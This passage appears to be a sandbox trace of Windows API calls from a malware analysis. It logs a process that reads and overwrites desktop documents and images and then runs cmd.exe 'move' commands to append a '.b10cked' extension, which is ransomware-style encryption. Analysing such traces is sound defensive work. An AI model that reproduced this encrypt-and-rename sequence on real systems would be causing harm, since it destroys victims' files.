nNumberOfBytesToWrite=0x8aaa, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x8aaa, lpOverlapped=0x0) returned 1 [0228.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tdxt9-_3mYM7NtN.pptx", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0228.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tdxt9-_3mYM7NtN.pptx", cchWideChar=20, lpMultiByteStr=0x1328794, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="Tdxt9-_3mYM7NtN.pptx", lpUsedDefaultChar=0x0) returned 20 [0228.642] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x11556 [0228.642] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0228.642] CloseHandle (hObject=0x1b4) returned 1 [0228.643] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT") returned 0x25 [0228.644] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0228.644] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x6dc, dwThreadId=0x3a4)) returned 1 [0228.817] CloseHandle (hObject=0x120) returned 1 [0228.817] CloseHandle (hObject=0x1b4) 
returned 1 [0228.817] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.817] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.817] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 1 [0228.817] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.817] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.817] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0228.817] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.817] ReleaseMutex (hMutex=0xf8) returned 1 [0228.817] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.817] ReleaseMutex (hMutex=0xf8) returned 1 [0228.817] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.817] ReleaseMutex (hMutex=0xf8) returned 1 [0228.817] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.817] ReleaseMutex (hMutex=0xf8) returned 1 [0228.817] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt" (normalized: "c:\\users\\eebsym5\\desktop\\twv414dcfhsa.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0228.817] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0228.817] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28560680894) returned 1 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x29bd [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 
0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.818] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x29bd [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.819] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x24d5 [0228.819] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0228.820] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0228.820] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.820] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x29bd [0228.820] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.820] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0228.820] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.820] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x29bd [0228.820] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.821] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.821] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x14dd, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x14dd, lpOverlapped=0x0) returned 1 [0228.821] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.821] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x14dd, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x14dd, lpOverlapped=0x0) returned 1 [0228.821] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-5341, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x14e0 [0228.821] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x14dd, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x14dd, 
lpOverlapped=0x0) returned 1 [0228.821] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-5341, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x14e0 [0228.821] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x14dd, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x14dd, lpOverlapped=0x0) returned 1 [0228.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tWV414DCFHSA.ppt", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0228.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tWV414DCFHSA.ppt", cchWideChar=16, lpMultiByteStr=0x1328794, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tWV414DCFHSA.ppt", lpUsedDefaultChar=0x0) returned 16 [0228.826] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x29bd [0228.826] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0228.826] CloseHandle (hObject=0x1b4) returned 1 [0229.171] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT") returned 0x25 [0229.171] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0229.171] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT\" 
\"C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x130, dwThreadId=0xd98)) returned 1 [0229.176] CloseHandle (hObject=0x120) returned 1 [0229.176] CloseHandle (hObject=0x1b4) returned 1 [0229.176] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.176] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0229.176] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 1 [0229.176] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.176] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.176] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0229.177] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.177] ReleaseMutex 
(hMutex=0xf8) returned 1 [0229.177] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.177] ReleaseMutex (hMutex=0xf8) returned 1 [0229.177] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.177] ReleaseMutex (hMutex=0xf8) returned 1 [0229.177] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.177] ReleaseMutex (hMutex=0xf8) returned 1 [0229.177] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\vx2e_agjufqyd1woq.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.177] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28596632063) returned 1 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x11de4 [0229.177] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11de4 [0229.178] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.178] SetFilePointer (in: 
